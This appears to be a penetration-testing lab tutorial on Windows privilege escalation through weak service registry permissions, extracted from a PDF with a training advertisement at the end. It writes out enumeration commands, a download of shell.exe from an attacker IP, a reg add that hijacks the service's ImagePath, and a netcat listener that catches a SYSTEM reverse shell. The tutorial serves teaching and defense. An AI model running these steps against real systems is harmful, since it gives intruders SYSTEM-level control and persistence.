Windows Privilege Escalation - Logon Autostart Execution
Windows Privilege Escalation - Logon Autostart Execution
Introduction.......................................................................................3
Weak Registry Permission ..................................................................4
Prerequisite .......................................................................................4
Lab Setup ...........................................................................................4
Abusing Weak Registry Services .........................................................6
Enumerate Vulnerable Registry key using Accesschk.exe ................................. 6
Enumerate Vulnerable Registry key using Powershell ...................................... 7
Enumerate Vulnerable Registry key using WinPEASx64 .................................... 8
Create Malicious Executable .............................................................................. 8
Page 2 of 9
Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access
to Windows components including services, files, and registry entries. Exploiting Weak Registry
Permissions is one technique to increase privileges.
Introduction
Windows Registry
The registry is a system-defined database in which applications and system components store and retrieve
configuration data. The registry is a hierarchical database that contains data that is critical for the
operation of Windows and the applications and services that run on Windows.
You can use Registry Editor to do the following actions:
Page 3 of 9
Weak Registry Permission
By hijacking the Registry entries utilized by services, attackers can run their malicious payloads. Attackers
may use weaknesses in registry permissions to divert from the initially stated executable to one they
control upon Service start, allowing them to execute their unauthorized malware.
Mitre ID: T1574.011
Tactics: Privilege Escalation & Persistence
Platforms: Windows
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: SubinACL, PowerUP.ps1, Winpeas.
Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat,
etc.
Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the Weak
Registry Key.
Lab Setup
Step 1: Run CMD as administrator and execute the below command to create a service with the name of
Pentest inside /temp directory.
Step2: To create a vulnerable service we need to assign some toxic privilege with the help
of SubinACL to change the permission of services.
NOTE:
SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with
security permissions in Windows. This tool is capable of changing the permissions of files, folders,
registry keys, services, printers, cluster shares, and various other types of objects.
In this case, we have granted a user’s permissions to suspend (pause/continue), start, and stop (restart)
a service.
Page 4 of 9
Step3: After downloading SubinACL, execute the following command to assign PTO Permissions user
“ignite” against the “Pentest” service.
Page 5 of 9
Abusing Weak Registry Services
Enumerate Vulnerable Registry key using Accesschk.exe
An attacker can escalate privileges by exploiting Weak Registry permission if the current user has
permission to alter Registry keys associated with the service.
Following an initial foothold, we can query for service registry keys permissions using the accesschk.exe
Sysinternals tool.
nc -lvp 1245
accesschk.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services
As result, we found ALL Access is assigned for the authenticated user for the “Pentest” registry key.
Page 6 of 9
With the following command, we query for the image path for service.
powershell
Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\pentest | fl
Page 7 of 9
Enumerate Vulnerable Registry key using WinPEASx64
Even, using auto script WinPEASx64 we enumerate weak service registry which is another method post
enumeration for weak configuration.
Page 8 of 9
cd c:\Users\Public
powershell wget http://192.168.1.3/shell.exe -o shell.exe
reg add "HKLM\system\currentcontrolset\services\pentest" /t REG_EXPAND_SZ /v ImagePath
/d "C:\Users\Public\shell.exe" /f
net start pentest
When the service starts or is restarted, then the adversary-controlled program will execute, allowing the
adversary to gain persistence and/or privilege escalation to the account context the service is set to
execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Thus, as soon as the service will launch, the attacker will get a reverse connection in the new netcat session
as NT Authority \system
When the service starts or is restarted, then the adversary-controlled program will execute, allowing the
adversary to gain persistence and/or privilege escalation to the account context the service is set to
execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Thus, as soon as the service will launch, the attacker will get a reverse connection in the new netcat session
as NT Authority \system
nc -lvp 8888
whoami
References:
https://attack.mitre.org/techniques/T1574/011/
https://docs.microsoft.com/en-us/windows/win32/sysinfo/registr
Page 9 of 9
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Network Pentest
Wireless Pentest
ADVANCED
Advanced CTF
Android Pentest Metasploit
EXPERT
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in